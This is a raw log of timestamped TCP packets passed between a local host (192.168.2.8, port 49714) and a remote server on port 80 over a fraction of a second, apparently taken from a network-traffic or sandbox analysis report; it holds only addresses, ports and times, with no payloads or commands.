                                                                              Jan 10, 2025 18:54:22.029674053 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029685020 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.029689074 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029712915 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.029732943 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.034338951 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034379005 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034394979 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034400940 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034459114 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034471035 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034483910 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034512997 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.034543991 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.034579992 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034615993 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034616947 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.034629107 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034642935 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034667969 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.034677029 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034687996 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034714937 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.034754992 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034770012 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034781933 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034790993 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.034795046 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034821033 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.034842014 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034866095 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034878969 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034882069 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.034905910 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034910917 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.034944057 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034957886 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.034979105 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.035067081 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035084009 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035096884 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035106897 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.035109043 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035129070 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035135984 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.035146952 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035170078 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.035171986 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035214901 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.035279036 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035290956 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035307884 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035326958 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.035331011 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035357952 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035366058 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.035370111 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035386086 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035402060 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.035403967 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.035434961 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.054341078 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.054358959 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.054373980 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.054385900 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.054480076 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.114644051 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.114717007 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.114774942 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.114826918 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.114837885 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.114865065 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.114897966 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.114942074 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.114993095 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115025043 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.115046024 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115071058 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.115083933 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115128040 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.115137100 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115174055 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115206957 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115217924 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.115243912 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115295887 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.115297079 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115384102 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115413904 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115431070 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.115469933 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115504980 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115514994 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.115555048 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115590096 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115606070 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.115624905 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115659952 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115674019 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.115715981 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115751982 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115763903 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.115787029 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115820885 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115833044 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.115856886 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115894079 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115901947 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.115946054 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115981102 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.115993023 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.116014957 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116050959 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116063118 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.116106033 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116142035 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116151094 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.116178036 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116221905 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.116231918 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116286039 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116329908 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.116338015 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116389990 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116432905 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.116444111 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116477966 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116514921 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116525888 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.116573095 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116616964 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.116624117 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116661072 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116707087 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.116713047 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116749048 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116782904 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116794109 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.116833925 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116868973 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116880894 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.116908073 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116942883 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.116956949 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.116976976 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117012024 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117022038 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.117043018 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117078066 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117086887 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.117111921 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117146969 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117156029 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.117185116 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117218971 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117228985 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.117259026 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117290020 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117306948 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.117324114 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117358923 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117376089 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.117393017 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117429018 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117438078 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.117464066 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117497921 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117508888 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.117535114 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117568970 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117578030 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.117604971 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117640972 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117650032 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.117675066 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117707968 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117718935 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.117743969 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117779016 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.117789030 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.121555090 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.121615887 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.121644974 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.121671915 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.121707916 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.121720076 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.121743917 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.121773958 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.121800900 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.121809006 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.121857882 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.121867895 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.121897936 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.121943951 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.121953011 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122004032 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122034073 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122047901 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122068882 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122112989 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122119904 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122170925 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122210026 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122219086 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122245073 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122279882 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122292995 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122323036 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122351885 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122368097 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122385979 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122405052 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122417927 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122428894 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122437000 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122453928 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122457027 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122469902 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122488022 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122495890 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122524977 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122575998 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122592926 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122611046 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122627974 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122658968 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122672081 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122685909 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122695923 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122699976 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122725964 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122771025 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122812033 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122826099 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122848034 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122889042 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122898102 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122910023 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122922897 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122936964 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.122947931 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.122967958 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.141751051 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.141784906 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.141803026 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.141814947 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.141829967 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.141843081 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.141855955 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.141869068 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.141879082 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.141941071 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.141963959 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.201575041 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201591969 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201615095 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201627970 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201642036 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201653957 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201666117 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201678991 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201698065 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201711893 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201718092 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201730967 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201736927 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201769114 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201782942 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201889038 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201900005 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201904058 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.201910973 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201924086 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201937914 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.201950073 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.201950073 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.201958895 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.201987982 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.201996088 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202027082 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202038050 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202078104 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.202143908 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202155113 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202167988 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202183008 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.202183008 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202209949 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.202275991 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202290058 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202301025 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202313900 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202318907 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.202331066 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.202399969 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202413082 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202424049 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202435970 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202439070 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.202464104 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.202538013 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202549934 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202563047 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202590942 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.202613115 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.202632904 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202644110 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202656031 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202677965 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.202764034 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202780008 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202792883 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202802896 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202815056 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.202822924 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.202840090 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.202866077 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.203052998 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203066111 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203073978 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203085899 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203093052 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203104973 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203118086 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203141928 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.203150988 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.203166008 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203211069 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203221083 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203232050 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203246117 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.203255892 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.203279018 CET8049714104.21.28.65192.168.2.8
